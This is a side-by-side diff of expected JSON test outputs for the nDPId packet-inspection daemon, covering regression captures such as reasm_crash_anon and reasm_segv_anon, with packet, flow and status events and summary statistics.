Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00505{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":14,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":2179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":12,"global_ts_msec":1258165452688} 00505{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":14,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":2179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":12,"global_ts_msec":1258165452688}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -22,6 +22,6 @@
~~ total memory freed........: 4680266 bytes ~~ total memory freed........: 4680266 bytes
~~ total allocations/frees...: 101159/101159 ~~ total allocations/frees...: 101159/101159
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 253 chars ~~ json string min len.......: 239 chars
~~ json string max len.......: 1994 chars ~~ json string max len.......: 1994 chars
~~ json string avg len.......: 1135 chars ~~ json string avg len.......: 1129 chars

3790
test/results/ocs.pcap.out
View File

File diff suppressed because it is too large Load Diff

1418
test/results/quic-mvfst-22_decryption_error.pcap.out
View File

File diff suppressed because it is too large Load Diff

40
test/results/reasm_crash_anon.pcapng.out
View File

@@ -4,27 +4,27 @@
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1410865705719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1410865705719,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAH6lHkAAQAYvuwrRCJTAqJGTVe\/IEt2R21o7+2QM0BgBxZZgqqoBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1410865705719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1410865705719,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAH6lHkAAQAYvuwrRCJTAqJGTVe\/IEt2R21o7+2QM0BgBxZZgqqoBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410865735821,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAUEBk0AAQAbShMCokZMK0QiUyBJV7zv7ZBndkeFwgBghOxJYAAABAQgKPppBVDphzho8ZGV0YWlscyAvPg0K"} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410865735821,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAUEBk0AAQAbShMCokZMK0QiUyBJV7zv7ZBndkeFwgBghOxJYAAABAQgKPppBVDphzho8ZGV0YWlscyAvPg0K"}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410865765918} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410865765918}
00461{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1410865765918,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAHqlIkAAQAYvvArRCJTAqJGTVe\/IEt2R4XA7+xsmgBgBxWJIAAABAQgKOmJDrj6aQVQ8ZGV0YWlscyBpZD0iIiA+Cgk8dXB0aW1lJQAyNzQ3ODY8L3VwdGltZT4KPC9kZXRhaWxzPgo="} 00447{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1410865765918,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAHqlIkAAQAYvvArRCJTAqJGTVe\/IEt2R4XA7+xsmgBgBxWJIAAABAQgKOmJDrj6aQVQ8ZGV0YWlscyBpZD0iIiA+Cgk8dXB0aW1lJQAyNzQ3ODY8L3VwdGltZT4KPC9kZXRhaWxzPgo="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":86,"global_ts_msec":1410865765920} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":86,"global_ts_msec":1410865765920}
00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1410865705717,"flow_last_seen":1410865856223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":3945,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1410865856223,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1410865705717,"flow_last_seen":1410865856223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":3945,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1410865856223,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00386{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410865916424,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAEDQBpEAAQAbDgMCokZMK0QiUyBJV7zv7ZGfdkfOygBAhO8pkAAABAQgKPpyNPTpkj5Y="} 00372{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410865916424,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAEDQBpEAAQAbDgMCokZMK0QiUyBJV7zv7ZGfdkfOygBAhO8pkAAABAQgKPpyNPTpkj5Y="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410865916424} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410865916424}
00386{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":68,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410866097026,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAIDQBtkAAQAazbsCokZMK0QiUyBJV7zv7ZLXdkgX0gBAhO3luAAABCApjn064OmdREwA="} 00372{"packet_event_id":1,"packet_event_name":"packet","packet_id":68,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410866097026,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAIDQBtkAAQAazbsCokZMK0QiUyBJV7zv7ZLXdkgX0gBAhO3luAAABCApjn064OmdREwA="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":68,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410866097027} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":68,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410866097027}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":81,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410866187327,"pkt":"AAQAAQAGplhD8kgGAAAIAEUALkEBwEAAQAalV8CokZMK0QiUyBJV7zv7ZNzdkg8VgBghOxx4AAABAQgKPqElBzposdE8ZGV0YWlscyAvPg0K"} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410866187327,"pkt":"AAQAAQAGplhD8kgGAAAIAEUALkEBwEAAQAalV8CokZMK0QiUyBJV7zv7ZNzdkg8VgBghOxx4AAABAQgKPqElBzposdE8ZGV0YWlscyAvPg0K"}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":81,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410866217426} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":81,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410866217426}
00370{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":87,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":56,"pkt_l4_len":0,"thread_ts_msec":1410866247528,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAADQBxUAAQAbTXsCokZMK0QiUyBJV7zv7ZPbdkhUrgRAhO4yLAAA="} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":56,"pkt_l4_len":0,"thread_ts_msec":1410866247528,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAADQBxUAAQAbTXsCokZMK0QiUyBJV7zv7ZPbdkhUrgRAhO4yLAAA="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":87,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1410866247530} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":87,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1410866247530}
00483{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":94,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":94,"packets-processed":87,"total-skipped-flows":0,"total-l4-data-len":4999,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-events-serialized":20,"global_ts_msec":1410866307727} 00483{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":94,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":94,"packets-processed":87,"total-skipped-flows":0,"total-l4-data-len":4999,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-events-serialized":20,"global_ts_msec":1410866307727}
00403{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":108,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410866398032,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAekEB1UAAQAZZQsCokZMK0QiUyBJV7zv7ZTfdkiRigBghO5ioAAABAQgKPqRcFzpr6OI8ZGV0YWlscyAvPg0K"} 00389{"packet_event_id":1,"packet_event_name":"packet","packet_id":108,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410866398032,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAekEB1UAAQAZZQsCokZMK0QiUyBJV7zv7ZTfdkiRigBghO5ioAAABAQgKPqRcFzpr6OI8ZGV0YWlscyAvPg0K"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":108,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410866428129} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":108,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410866428129}
00389{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":130,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410866578634,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAHQB5UAAQAbS\/8CokZMK0QiUyBJV7zv7ZYXdkjPPgBAhO1OLAAABAQgKPqan\/zpuql4="} 00375{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410866578634,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAHQB5UAAQAbS\/8CokZMK0QiUyBJV7zv7ZYXdkjPPgBAhO1OLAAABAQgKPqan\/zpuql4="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":130,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410866578634} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":130,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410866578634}
00486{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":170,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":170,"packets-processed":161,"total-skipped-flows":0,"total-l4-data-len":6132,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-events-serialized":25,"global_ts_msec":1410866909737} 00486{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":170,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":170,"packets-processed":161,"total-skipped-flows":0,"total-l4-data-len":6132,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-events-serialized":25,"global_ts_msec":1410866909737}
00388{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410867060242,"pkt":"AAQAAQAGplhD8kgGAAAIAEUARjQCFUAAQAaND8CokZMK0QiUyBJV7zv7ZlXdkmR\/gBAhO29pAAABAQgKPq4BRzp2A6k="} 00374{"packet_event_id":1,"packet_event_name":"packet","packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410867060242,"pkt":"AAQAAQAGplhD8kgGAAAIAEUARjQCFUAAQAaND8CokZMK0QiUyBJV7zv7ZlXdkmR\/gBAhO29pAAABAQgKPq4BRzp2A6k="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"thread_id":0,"packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410867060242} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410867060242}
00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1410865705717,"flow_last_seen":1410867180785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":6327,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1410867180785,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1410865705717,"flow_last_seen":1410867180785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":6327,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1410867180785,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00488{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":209,"packets-processed":200,"total-skipped-flows":0,"total-l4-data-len":6327,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":29,"global_ts_msec":1410867180785} 00488{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":209,"packets-processed":200,"total-skipped-flows":0,"total-l4-data-len":6327,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":29,"global_ts_msec":1410867180785}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -39,6 +39,6 @@
~~ total memory freed........: 4694657 bytes ~~ total memory freed........: 4694657 bytes
~~ total allocations/frees...: 101347/101347 ~~ total allocations/frees...: 101347/101347
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 234 chars ~~ json string min len.......: 220 chars
~~ json string max len.......: 657 chars ~~ json string max len.......: 657 chars
~~ json string avg len.......: 440 chars ~~ json string avg len.......: 433 chars

116
test/results/reasm_segv_anon.pcapng.out
View File

@@ -1,66 +1,66 @@
00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00475{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1550422828553} 00475{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1550422828553}
00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="} 00413{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="}
